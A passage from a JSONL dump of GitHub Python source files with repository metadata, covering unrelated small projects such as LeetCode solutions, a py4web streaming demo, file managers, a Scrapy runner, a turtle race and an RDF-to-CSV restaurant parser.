'''\n Graph generator graph_generator(cards)\n '''\n sets = search_set(cards)\n graph = pgv.AGraph()\n graph.add_nodes_from(sets)\n for a in sets:\n for b in sets:\n is_break = False\n for card_a in a:\n for card_b in b:\n if set(card_a.items()) - set(card_b.items()) == set([]):\n is_break = True\n graph.add_edge(a, b)\n graph.add_edge(b, a)\n break\n if is_break: break\n # removing self-loops\n for node in graph.iternodes():\n graph.delete_edge(node, node)\n return graph\n\ndef topology_sort(graph):\n '''\n WTF?\n '''\n disjointed = 0\n while graph:\n topology = []\n for node in graph.iternodes():\n topology.append((node, len(graph.neighbors(node))))\n topology.sort(key = lambda x: x[1])\n extracted_node = topology[0][0]\n for neighbor in graph.neighbors(extracted_node):\n graph.delete_node(neighbor)\n graph.delete_node(extracted_node)\n disjointed += 1\n return disjointed\n","repo_name":"sergey-lebedev/set","sub_path":"game/set.py","file_name":"set.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"27841076199","text":"class Solution:\n \"\"\"\n @param grid: a list of lists of integers.\n @return: An integer, minimizes the sum of all numbers along its path\n \"\"\"\n def minPathSum(self, grid):\n for i in xrange(len(grid)):\n for j in xrange(len(grid[i])):\n if i > 0 and j > 0:\n grid[i][j] += min(grid[i - 1][j], grid[i][j - 1])\n elif i > 0:\n grid[i][j] += grid[i - 1][j]\n elif j > 0:\n grid[i][j] += grid[i][j - 1]\n return grid[-1][-1]\n","repo_name":"yuhanlyu/Snippets","sub_path":"lintcode/minimum_path_sum.py","file_name":"minimum_path_sum.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"45"} +{"seq_id":"28714747695","text":"import cv2\nimport gradio as gr\n\nface_cascade = cv2.CascadeClassifier(\"files/haarcascade_frontalface_default.xml\")\n\ndef detect_faces(image):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x,y,w,h) in faces:\n cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)\n return cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\niface = gr.Interface(fn=detect_faces, inputs=\"image\", outputs=\"image\")\n\niface.launch()\n\n","repo_name":"fabriceDurand/Computer-vision","sub_path":"Web app - detection/gradimage.py","file_name":"gradimage.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"22351391447","text":"from py4web import action, request, response, abort, redirect, URL\nimport os, sys\n\nfrom math import sqrt\nfrom time import sleep\nfrom datetime import datetime\nimport json\nimport threading\nimport uuid\nfrom itertools import count\n\nunique_num = count(start=0, step = 1) \n\n\nclass SafeList:\n def __init__(self):\n self._list = list()\n self._lock = threading.Lock()\n\n def append(self, value):\n with self._lock:\n self._list.append(value)\n\n def check(self, value):\n with self._lock:\n return value in self._list\n\n def remove(self, value):\n with self._lock:\n self._list.remove(value)\n\n def pop(self):\n with self._lock:\n return self._list.pop()\n\n def get(self, index):\n with self._lock:\n return self._list[index]\n\n def length(self):\n with self._lock:\n return len(self._list)\n\nyield_id_list = SafeList()\n\n# ---------------------------------------------------------------------------\n\n# https://gist.github.com/platdrag/e755f3947552804c42633a99ffd325d4\n\nclass threadsafe_iter:\n \"\"\"Takes an iterator/generator and makes it thread-safe by\n serializing call to the `next` method of given iterator/generator.\n \"\"\"\n\n def __init__(self, it):\n self.it = it\n self.lock = threading.Lock()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n with self.lock:\n return self.it.__next__()\n\n\ndef threadsafe_generator(f):\n \"\"\"A decorator that takes a generator function and makes it thread-safe.\"\"\"\n\n def g(*a, **kw):\n return threadsafe_iter(f(*a, **kw))\n\n return g\n# ------------------------------------------------------------------------\n\ndef threads_info():\n print ( f\"========== {sys._getframe().f_code.co_name}\" )\n\n #print (sys._current_frames().values() )\n f = list(sys._current_frames().values())[0]\n print (\" \",f.f_back.f_globals['__file__'] )\n print (\" \", f.f_back.f_globals['__name__'] )\n getframe_expr = \"sys._getframe({}).f_code.co_name\"\n caller = eval(getframe_expr.format(2))\n callers_caller = eval(getframe_expr.format(3))\n print(\" -- called from: \", caller)\n print(\" \", caller, \"was called from: \", callers_caller, \"--\")\n\n print(\" name: \",threading.current_thread().name)\n print(\" ident: \",threading.get_ident())\n _ = [ print(' ',thread.name) for thread in threading.enumerate() ]\n\n# ------------------------------------------------------------------------\n\n@action(\"polling/stream_sqrt_id_data\", method=[\"GET\", ])\ndef stream_sqrt_id_data():\n\n gen_id = str(next(unique_num) )\n @threadsafe_generator\n def generate_sqrt():\n\n #threads_info()\n\n try:\n\n yield_id = str(uuid.uuid4())\n yield_id_list.append(yield_id)\n\n for i in range(30):\n\n if not yield_id_list.check(yield_id):\n break\n\n json_data = json.dumps(\n {\n \"time\": datetime.now().strftime(\"%H:%M:%S.%f\")[:-3], \n \"value\": f\"{sqrt(i):.2f}\",\n \"yield_id\": yield_id,\n 'gen_id': gen_id,\n }\n )\n\n response.headers[\"Cache-Control\"] = \"no-store\"\n yield f\"{json_data}\\n\\n\"\n sleep(1)\n\n finally:\n if yield_id_list.check(yield_id):\n yield_id_list.remove(yield_id)\n print ( f\"finally: {sys._getframe().f_code.co_name}; id: {gen_id}\" )\n\n return generate_sqrt()\n\n@action(\"polling/sqrt_id_post\", method=[\"POST\"])\ndef sqrt_id_post():\n\n try:\n json_data = json.loads(request.body.read())\n yield_id = json_data.get(\"yield_id\")\n if yield_id_list.check(json_data[\"yield_id\"]):\n yield_id_list.remove(yield_id)\n # print(\"found: \", json_data)\n #else:\n # print(\"not found: \", json_data)\n\n except Exception as ex:\n print(f\"ex! {sys._getframe().f_code.co_name}: \", ex)\n print(sys.exc_info())\n #template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n #message = template.format(type(ex).__name__, ex.args)\n #print (message)\n\n@action(\"polling/stream_sqrt_id\", method=[\"GET\", ])\n@action.uses( \"polling/stream_sqrt_id.html\", )\ndef stream_sqrt_id():\n return dict( stream_url = URL(\"polling/stream_sqrt_id_data\"),\n post_url = URL(\"polling/sqrt_id_post\") )\n","repo_name":"ali96343/lvsio","sub_path":"ssep4w/polling/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"70793111177","text":"import time\nfrom abc import ABC, abstractmethod\nimport json\nfrom json import JSONDecodeError\nfrom pathlib import Path\n\nimport yaml\n\nfrom settings import FIXTURES\nfrom src.vacancies.vacancies import Vacancies\n\n\nclass FileManager(ABC):\n \"\"\"Абстрактный класс для работы с файлами\"\"\"\n def __init__(self, file_name=None) -> None:\n \"\"\"\n Инициализация\n :param file_name: Имя файла (объект Path или имя файла строкой, который будет находится в папке fixtures\n \"\"\"\n if isinstance(file_name, Path):\n self.file = file_name\n else:\n self.file = Path(FIXTURES, file_name)\n\n @abstractmethod\n def load(self):\n pass\n\n @abstractmethod\n def save(self, data, mode):\n pass\n\n\nclass JSONManager(FileManager):\n\n @staticmethod\n def make_dict(vacancies: Vacancies) -> dict:\n \"\"\"\n Формирование словаря из объекта Vacancy.\n Собирает словарь из списка объектов вакансий.\n Добавляются в словарь только вакансии НЕ отмеченные к удалению\n \"\"\"\n\n data = dict()\n for item in vacancies.list:\n if not item.is_to_removed:\n data[item.vacancy_id] = {'service': item.service,\n 'title': item.title,\n 'date': item.date,\n 'area': item.area,\n 'currency': item.currency,\n 'salary_fom': item.salary_fom,\n 'salary_to': item.salary_to,\n 'url': item.url,\n 'is_favorite': item.is_favorite\n }\n return data\n\n def load(self) -> dict:\n \"\"\"\n Чтение файла\n :return: словарь с данными из файла\n \"\"\"\n try:\n with open(self.file, 'r', encoding='UTF-8') as json_file:\n data = json.load(json_file)\n except JSONDecodeError:\n return dict()\n except FileNotFoundError:\n print(f'Файл не найден {self.file}')\n return dict()\n return data\n\n def save(self, data, mode='w'):\n \"\"\"\n Сохранение данных в файл. Если файла не существует, он будет создан.\n :param data: исходные данные\n :param mode: режим переписывания файла \"w\", дописывания \"a\"\n \"\"\"\n if not Path(self.file).exists():\n mode = 'a'\n with open(self.file, mode, encoding='UTF-8') as json_file:\n json.dump(data, json_file, ensure_ascii=False, indent=4)\n\n def save_vacancies(self, vacancies: Vacancies, log=False) -> None:\n \"\"\"\n Обновление файла с вакансиями из списка вакансий\n :param vacancies: экземпляр класса с вакансиями\n :param log: вывод сообщения о количестве записанных вакансий\n \"\"\"\n new_data = self.make_dict(vacancies)\n if Path(self.file).exists():\n data = self.load()\n n_old = len(data)\n data.update(new_data)\n for i in vacancies.list:\n if i.is_to_removed and data.get(i.vacancy_id):\n del data[i.vacancy_id]\n mode = 'w'\n else:\n n_old = 0\n data = new_data\n mode = 'a'\n\n with open(self.file, mode, encoding='UTF-8') as json_file:\n json.dump(data, json_file, ensure_ascii=False, indent=4)\n n_new = len(self.load())\n\n if log:\n msg = f'Добавлено вакансий: {n_new - n_old}. Всего в базе: {n_new}'\n print(msg, '\\n', '-' * len(msg))\n time.sleep(3)\n\n\nclass YAMLManager(FileManager):\n\n def load(self) -> dict:\n \"\"\"\n Чтение файла\n :return: словарь с данными из файла\n \"\"\"\n try:\n with open(self.file, \"r\", encoding=\"UTF-8\") as yaml_file:\n data = yaml.safe_load(yaml_file)\n except FileNotFoundError:\n print(f'Файл не найден {self.file}')\n return dict()\n if data is None:\n return dict()\n return data\n\n def save(self, data, mode='w') -> None:\n \"\"\"\n Сохранение данных в файл. Если файла не существует, он будет создан.\n :param data: исходные данные\n :param mode: режим переписывания файла \"w\", дописывания \"a\"\n \"\"\"\n if not Path(self.file).exists():\n mode = 'a'\n with open(self.file, mode, encoding=\"UTF-8\") as yaml_file:\n yaml.safe_dump(data, yaml_file, sort_keys=False, allow_unicode=True)\n","repo_name":"ualex90/Coursework_4","sub_path":"src/utils/file_manager.py","file_name":"file_manager.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"70676362377","text":"with open(file_name, \"r\") as fn:\n words = fn.readlines()\n\ndic = {}\nfor word in words:\n if word[0] != \"t\":\n continue\n if word not in dic:\n dic[word] = 1\n else:\n dic[word] += 1\n\nl = []\nfor word in dic.keys():\n l.append((word, dic[word]))\nl.sort(key=lambda x: x[1])\n\ncounter = 0\nfor tp in l:\n print(tp)\n counter += 1\n if counter == 10:\n break","repo_name":"XMK233/Leetcode-Journey","sub_path":"code_test-2021/华控清交2.py","file_name":"华控清交2.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11444436752","text":"n=int(input())\nstack=[]\nfor i in range(n):\n stack.append(int(input()))\nm=int(input())\nn=[]\nfor j in range(m):\n a=list(input().split())\n if a[0]=='A':\n stack.append(a[1])\n else:\n if(stack==[]):\n print(\"No\")\n break\n n.append(stack.pop(-1))\nif stack!=[]:\n while n!=[]:\n print(n.pop(0),end=' ')\n print(\"\\n\",end='')\nwhile stack!=[]:\n print(stack.pop(-1),end=' ')","repo_name":"Harahan/BUAA-python-data-structure-2021","sub_path":"python_work/week4/t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"17914158294","text":"from turtle import Turtle \nfrom random import randint\n\nlaura = Turtle()\n\nlaura.color('red')\nlaura.shape('turtle')\n\nlaura.penup()\nlaura.goto(-160,100)\nlaura.pendown()\n\nrik = Turtle()\n\nrik.color('green')\nrik.shape('turtle')\n\nrik.penup()\nrik.goto(-160,70)\nrik.pendown()\n\nlauren = Turtle()\n\nlauren.color('blue')\nlauren.shape('turtle')\n\nlauren.penup()\nlauren.goto(-160,40)\nlauren.pendown()\n\ncarren = Turtle()\n\ncarren.color('pink')\ncarren.shape('turtle')\n\ncarren.penup()\ncarren.goto(-160,10)\ncarren.pendown()\n\nfor movement in range(120):\n laura.forward(randint(1,5))\n rik.forward(randint(1,5))\n lauren.forward(randint(1,5))\n carren.forward(randint(1,5))\n if(laura.xcor()>=185):\n print(\"laura won\")\n exit()\n if(rik.xcor()>=185):\n print(\"rik won\")\n exit()\n if(lauren.xcor()>=185):\n print(\"lauren won\")\n exit()\n if(carren.xcor()>=185):\n print(\"carren won\")\n exit()\n","repo_name":"Roshni0/Games","sub_path":"Turtle/race.py","file_name":"race.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"15771401132","text":"import pip\nimport subprocess\nimport time\nimport csv\nimport glob\nfrom shutil import copy2\nimport sys\nimport getpass\nimport os\nfrom pathlib import Path\nfrom datetime import datetime, timedelta\nfrom os.path import exists, abspath, join, isdir, isfile\n# Get PATH conf\nfrom conf import PATH\n\nCATALOGUE_PATH = abspath(join(PATH[\"download_path\"],\"images\",\"{0}\"))\nFINAL_OUTPUT_PATH = join(PATH[\"final_output_path\"], \"{0}\")\n\n# Get next Monday from current date\ndef get_last_monday():\n cur_time = datetime.now()\n last_monday = cur_time - timedelta(days=cur_time.weekday())\n last_monday = last_monday.replace(hour=6, minute=0)\n date_range = cur_time - last_monday\n # Check today is Monday (time before 8h00 AM)\n if date_range.days == -1:\n last_monday = cur_time - timedelta(days=cur_time.weekday()+7)\n last_monday_folder = last_monday.strftime(\"%Y%m%d\")\n else:\n last_monday_folder = last_monday.strftime(\"%Y%m%d\")\n \n return last_monday_folder\n \ndef get_next_monday():\n # Get next Monday from current date\n cur_time = datetime.now()\n last_monday = cur_time - timedelta(days=cur_time.weekday())\n last_monday = last_monday.replace(hour=9, minute=0)\n date_range = cur_time - last_monday\n # Check today is Monday (time before 8h00 AM)\n if date_range.days == -1:\n next_monday_folder = last_monday.strftime(\"%Y%m%d\")\n else:\n next_monday = cur_time - timedelta(days=cur_time.weekday()-7)\n next_monday_folder = next_monday.strftime(\"%Y%m%d\")\n \n return next_monday_folder\n \ndef import_or_install(package):\n try:\n __import__(package)\n except ImportError:\n pip.main(['install', package])\n \ndef copy_to_local_sharepoint():\n print(\"\\n\\t>>> COPYING TO FINAL PATH...\")\n last_monday_folder = get_next_monday()\n \n cata_path = CATALOGUE_PATH.format(last_monday_folder)\n final_path = FINAL_OUTPUT_PATH.format(last_monday_folder)\n if exists(cata_path):\n for cat_name_dir in os.listdir(cata_path):\n cat_name_path = join(cata_path, cat_name_dir)\n if isdir(cat_name_path):\n for cat_file_dir in os.listdir(cat_name_path):\n cat_files_path = join(cat_name_path, cat_file_dir)\n if isdir(cat_files_path):\n final_file_path = join(final_path, cat_name_dir, cat_file_dir)\n if not exists(final_file_path):\n Path(final_file_path).mkdir(parents=True, exist_ok=True)\n for cat_file in os.listdir(cat_files_path):\n cat_file_path = join(cat_files_path, cat_file)\n if isfile(cat_file_path) and cat_file.endswith(\".pdf\"):\n print(\"\\t[COPY]:{0}\".format(cat_file))\n copy2(cat_file_path, final_file_path)\n \ndef main(scrapy_arg, option=None):\n package_list = [\"scrapy\", \"img2pdf\"]\n for package in package_list:\n import_or_install(package)\n \n print(\"\\n\\t------------------ GET CATALOGUES ------------------\")\n print(\"\\n\\t>> Using SCRAPY\")\n if option == None:\n print(\"\\n\\t1. Get all new catalogues.\")\n print(\"\\t2. Get only catalogue or all catalogues from one brand\")\n print(\"\\t3. Run test-catalogue\")\n print(\"\\t4. Exit\")\n option = input(\"\\n\\tEnter: \")\n\n while True:\n print(\"\\n\\n\\t[ {0} ]\".format(datetime.now().strftime(\"%Y-%m-%d %H:%M\")))\n print(\"\\n\\t>> RUNNING...\")\n if option == \"1\":\n subprocess.call([\"scrapy\", \"crawl\", \"catalogues\", \"--nolog\"])\n print(\"\\n\\t********************** FINISH **********************\")\n elif option == \"2\":\n subprocess.call([\"scrapy\", \"crawl\", \"special-catalogue\"])\n print(\"\\n\\t********************** FINISH **********************\")\n elif option == \"3\":\n subprocess.call([\"scrapy\", \"crawl\", \"test-catalogue\"])\n print(\"\\n\\t********************** FINISH **********************\")\n elif option == \"4\":\n return None\n else:\n print(\"Wrong number\")\n break\n \n # COLLECT ALL CATALOGUES FOR 1 WEEK and SEND BY EMAIL (PENDING)\n # -------------------------------------------------------------\n copy_to_local_sharepoint()\n # -------------------------------------------------------------\n print(\"\\n\\n\\t>> RUN AGAIN IN 24 HOURS\")\n time.sleep(60*60*24)\n\n #input(\"Press any keys to Exit\")\n\n# Using python RUN.py --weekly --nolog\n# for weekly Catalogues\nif __name__ == \"__main__\":\n option = None\n scrapy_arg = []\n \n for arg in sys.argv:\n if arg == '--weekly':\n option = '1'\n elif arg == '--special':\n option = '2'\n elif arg.startswith(\"--\"):\n scrapy_arg.append(arg)\n \n main(scrapy_arg, option)","repo_name":"tienking/catalogues_with_scrapy","sub_path":"catalogues/RUN.py","file_name":"RUN.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"12111672274","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n \n ret = [[]]\n #at each step: adds current number to everything in list (while preserving current list)\n for num in nums:\n length = len(ret)\n for i in range(0, length):\n ret.append(ret[i] + [num])\n \n return ret\n\n#runtime: O(n^2)?\n#memory: O(n^2)?","repo_name":"noahlwest/leetcode","sub_path":"python/medium/78_Subsets.py","file_name":"78_Subsets.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"20214057241","text":"# Function to take a string as an arguement and return the number of times the string \"code\" appears in the string.\r\n\r\n\"\"\"\r\nPseudocode\r\n\r\nDEFINE function 'strcount(s)'\r\n get the length of 's' and assign it to variable 'length'\r\n set variable 'count' = 0\r\n FOR 'i' in range (start = 0, end = length-3, iteration = 1)\r\n IF s character [i] = \"c\"\r\n IF s character[i+1]=\"o\"\r\n IF s character [i+2] = \"d\"\r\n IF s character [1+3] = \"e\"\r\n count = count + 1\r\n print \"The string \"code\" appears\" count \"times in your string\"\r\n RETURN count\r\n \r\n\r\n\"\"\"\r\n\r\n# Since this is far too easy with the s.count function, I'm assuming we are to do it from first principles?\r\ndef strcount(s):\r\n length=len(s)\r\n count=0\r\n for i in range(length-3):\r\n if s[i]==\"c\":\r\n if s[i+1]==\"o\":\r\n if s[i+2]==\"d\":\r\n if s[i+3]==\"e\":\r\n count+=1\r\n print(\"The string \\\"code\\\" appears\", count, \"time(s) in your string\")\r\n return count\r\n\r\n# Container to request arguement and call function\r\ns=str(input(\"please enter a string to check: \"))\r\nstrcount(s)\r\n","repo_name":"VectorSigmaGen1/Basic_Introductory_Python","sub_path":"Practical 18 - 17th October 2019/p18p2.py","file_name":"p18p2.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26340298153","text":"import glob\nimport subprocess\nimport json\nimport os\n\nfolders = glob.glob(\"_codefolders/*\")\n\nlangs = {}\n\nfor folder in folders:\n\tprint(folder)\n\tfoldername = folder.split(\"/\")[-1]\n\tdatadir = os.path.expanduser(\"~/.slocdata/{}\".format(foldername))\n\t#os.makedirs(datadir, exist_ok=True)\n\t#cmd = \"sloccount --cached --datadir {} {}\".format(datadir, folder)\n\tcmd = \"sloccount {}\".format(folder)\n\tp = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)\n\ts = p.stdout.decode()\n\tinstats = False\n\tfor line in s.split(\"\\n\"):\n\t\tline = line.strip()\n\t\tif line.startswith(\"Totals grouped by\"):\n\t\t\tinstats = True\n\t\telif instats:\n\t\t\tif not line:\n\t\t\t\tinstats = False\n\t\t\telse:\n\t\t\t\tlang, num, pct = line.split()\n\t\t\t\tlang = lang[:-1]\n\t\t\t\tnum = int(num)\n\t\t\t\tpct = float(pct[1:-2])\n\t\t\t\tprint(\"#\", lang, num, pct)\n\t\t\t\tif not foldername in langs:\n\t\t\t\t\tlangs[foldername] = []\n\t\t\t\tlangs[foldername].append((lang, num, pct))\n\nf = open(\"sloc.json\", \"w\")\njson.dump(langs, f)\nf.close()\n","repo_name":"serviceprototypinglab/aws-sar-analysis","sub_path":"githubstats/sloc.py","file_name":"sloc.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"17780048403","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport likeable.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('likeable', '0008_auto_20141001_1350'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='downloadedarticle',\n name='fields_dirty',\n ),\n migrations.AddField(\n model_name='downloadedarticle',\n name='body_text',\n field=models.TextField(null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='downloadedarticle',\n name='scrape_when',\n field=models.DateTimeField(null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='urlsignature',\n name='body_text_selector',\n field=models.CharField(max_length=1000, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='urlsignature',\n name='modified_when',\n field=models.DateTimeField(default=likeable.models.utcnow),\n preserve_default=True,\n ),\n ]\n","repo_name":"schwa-lab/sharingnews","sub_path":"likeable/migrations/0009_auto_20141003_0446.py","file_name":"0009_auto_20141003_0446.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"4372456254","text":"import torch\r\nimport hyperparameters as hps\r\nimport utils\r\nimport numpy as np\r\nfrom dataloader import DataLoader\r\n\r\n\r\ndef embedding(model_path, input_data_path):\r\n sec2sec = torch.load(model_path)\r\n dataloader = DataLoader(input_data_path)\r\n audios = torch.from_numpy(dataloader.data).cuda().float()\r\n num_audios = audios.shape[1]\r\n\r\n encoder = sec2sec.encoder\r\n\r\n embedding_vectors = np.zeros((num_audios, hps.latent_vector_length))\r\n batch_start_index = 0\r\n while batch_start_index + hps.batch_size < num_audios:\r\n vector = encoder(audios[:, batch_start_index:batch_start_index + hps.batch_size, :], hps.batch_size).detach()\r\n embedding_vectors[batch_start_index:batch_start_index + hps.batch_size, :] = vector.cpu().numpy()\r\n batch_start_index += hps.batch_size\r\n print(\"Embedded {} audios.\".format(batch_start_index))\r\n\r\n vector = encoder(audios[:, batch_start_index:num_audios, :], num_audios - batch_start_index).detach()\r\n embedding_vectors[batch_start_index:, :] = vector.cpu().numpy()\r\n print(\"Embedded {} audios.\".format(num_audios))\r\n return embedding_vectors\r\n\r\nif __name__ == \"__main__\":\r\n model_path = \"{}/sec2sec_mfcc_{}.pkl\".format(hps.model_dir, 5900)\r\n input_data_path = hps.mfcc_path\r\n output_data_path = \"mfcc_embedding_vector.pkl\"\r\n embedding_vectors = embedding(model_path, input_data_path)\r\n utils.save_pickle(output_data_path, embedding_vectors)\r\n","repo_name":"bryanwuAC/audio2vec","sub_path":"sec2sec/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"44706482973","text":"# coding: utf-8\n\nimport csv\n\nfrom HTMLParser import HTMLParser\n\nallrest=[]\n\n\nclass restaurant(object):\n nom = \"\"\n adreca = \"\"\n districte = \"\"\n barri = \"\"\n postal = \"\"\n telefon = \"\"\n telefon2 = \"\"\n latitud = \"\"\n longitud = \"\"\n web = \"\"\n\n def afegir_nom(self, nom):\n if self.nom == \"\":\n self.nom = nom\n else:\n self.nom = self.nom + '&' + nom\n\n def afegir_adreca(self, adreca):\n if adreca.find('C') == 0:\n self.adreca = \"Carrer\" + adreca[1:]\n elif adreca.find('P') == 0 and adreca.find('l') == 1:\n self.adreca = \"Plaça\" + adreca[2:]\n elif adreca.find('G') == 0 and adreca.find('V') == 2:\n self.adreca = \"Gran Via\" + adreca[4:]\n elif adreca.find('A') == 0 and adreca.find('v') == 1:\n self.adreca = \"Avinguda\" + adreca[2:]\n elif adreca.find('P') == 0 and adreca.find('t') == 1 and adreca.find('g') == 2 and adreca.find('e') == 3:\n self.adreca = \"Passatge\" + adreca[4:]\n elif adreca.find('P') == 0 and adreca.find('g') == 1:\n self.adreca = \"Passeig\" + adreca[2:]\n elif adreca.find('R') == 0 and adreca.find('b') == 1 and adreca.find('l') == 2 and adreca.find('a') == 3:\n self.adreca = \"Rambla\" + adreca[4:]\n elif adreca.find('P') == 0 and adreca.find('t') == 1 and adreca.find('j') == 2 and adreca.find('a') == 3:\n self.adreca = \"Platja\" + adreca[4:]\n elif adreca.find('T') == 0 and adreca.find('r') == 1 and adreca.find('a') == 2 and adreca.find('v') == 3:\n self.adreca = \"Travessera\" + adreca[4:]\n else:\n self.adreca = adreca\n\n def afegir_districte(self, districte):\n self.districte = districte\n\n def afegir_barri(self, barri):\n self.barri = barri\n\n def afegir_postal(self, postal):\n self.postal = postal\n\n def afegir_telefon(self, telefon):\n if telefon.find('+34') != -1:\n if self.telefon != \"\" and telefon != self.telefon:\n self.telefon2 = telefon\n else:\n self.telefon = telefon\n\n def afegir_latitud(self, latitud):\n self.latitud = latitud\n\n def afegir_longitud(self, longitud):\n self.longitud = longitud\n\n def afegir_web(self, web):\n webdos = ' '.join(web[0])\n pag_web_ini = webdos.find('http')\n if pag_web_ini != -1:\n self.web = webdos[pag_web_ini:]\n\n\nclass MHTMLParser(HTMLParser):\n\n crest = restaurant()\n ctag = \"\"\n\n def handle_starttag(self, tag, attrs):\n self.ctag = tag\n if tag == 'v:vcard':\n self.crest = restaurant()\n if tag == 'v:url':\n self.crest.afegir_web(attrs)\n\n def handle_endtag(self, tag):\n self.ctag = \"\"\n if tag == 'v:vcard':\n allrest.append(self.crest)\n\n def handle_data(self, data):\n if self.ctag == 'v:fn':\n self.crest.afegir_nom(data)\n if self.ctag == 'v:street-address':\n self.crest.afegir_adreca(data)\n if self.ctag == 'xv:district':\n self.crest.afegir_districte(data)\n if self.ctag == 'xv:neighborhood':\n self.crest.afegir_barri(data)\n if self.ctag == 'v:postal-code':\n self.crest.afegir_postal(data)\n if self.ctag == 'rdf:value':\n self.crest.afegir_telefon(data)\n if self.ctag == 'v:latitude':\n self.crest.afegir_latitud(data)\n if self.ctag == 'v:longitude':\n self.crest.afegir_longitud(data)\n\n\n\nf = open('restaurants.rdf', 'rb') # obre l'arxiu\nrdfSource = f.read()\nf.close()\n\ncsvOpen = open('restaurants.csv', 'wb')\ncsvSource = csv.writer(csvOpen)\n\nparser = MHTMLParser()\nparser.feed(rdfSource)\n\ncsvSource.writerow([\"Nom\"] + [\"Adreça\"] + [\"Districte\"] + [\"Barri\"] + [\"Codi Postal\"] + [\"Telèfon\"] +\n[\"Telèfon 2\"] + [\"Latitud\"] + [\"Longitud\"] + [\"Web\"])\nfor r in allrest:\n csvSource.writerow([r.nom] + [r.adreca] + [r.districte] + [r.barri] + [r.postal] + [r.telefon] +\n [r.telefon2] + [r.latitud] + [r.longitud] + [r.web])","repo_name":"garoi/Python","sub_path":"Practica/Script1.py","file_name":"Script1.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7479048480","text":"def menu(*args): # any number of positional arguments; args is then a tuple containing them\n while True:\n s = input(f'Enter choice ({args}): ').strip()\n \n if s in args:\n return s # did the user choose one of the elements of args? Return it!\n\n print(f'{s} is not a valid option; try again!')\n\n# were we run interactively, and *NOT* imported?\n# give the user a demo of our menu function!\nif __name__ == '__main__':\n user_choice = menu('a', 'b', 'c')\n print(f'You chose {user_choice}')","repo_name":"amauryrs/Cisco-2023-09September-26-modules","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"30941567420","text":"import copy\nimport random\nfrom typing import Dict, List, Tuple\nimport warnings\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom transformers import BertTokenizer\n\nfrom data_processing.tokenization import sentenize_text_with_ners\n\n\ndef transform_indicator_to_classmatrix(indicator: List[int]) -> np.ndarray:\n max_seq_len = len(indicator)\n one_hot_indicator = np.zeros((1, max_seq_len, 5), dtype=np.float32)\n for token_idx in range(len(indicator)):\n if indicator[token_idx] > 0:\n if (token_idx > 0) and (token_idx < (max_seq_len - 1)):\n if indicator[token_idx - 1] > 0:\n if indicator[token_idx] > 1:\n if indicator[token_idx + 1] > 0:\n class_idx = 1 # start ent\n else:\n class_idx = 3 # start-end ent\n else:\n if indicator[token_idx + 1] > 1:\n class_idx = 2 # end ent\n elif indicator[token_idx + 1] > 0:\n class_idx = 3 # middle ent\n else:\n class_idx = 2 # end ent\n elif indicator[token_idx + 1] > 0:\n if indicator[token_idx + 1] > 1:\n class_idx = 4 # start-end ent\n else:\n class_idx = 1 # start ent\n else:\n class_idx = 4 # start-end ent\n elif token_idx > 0: # token_idx == (max_seq_len - 1)\n if indicator[token_idx - 1] > 0:\n if indicator[token_idx - 1] > 1:\n class_idx = 4 # start-end ent\n else:\n class_idx = 2 # end ent\n else:\n class_idx = 4 # start-end ent\n else: # token_idx == 0\n if indicator[token_idx + 1] > 0:\n if indicator[token_idx + 1] > 1:\n class_idx = 4 # start-end ent\n else:\n class_idx = 1 # start ent\n 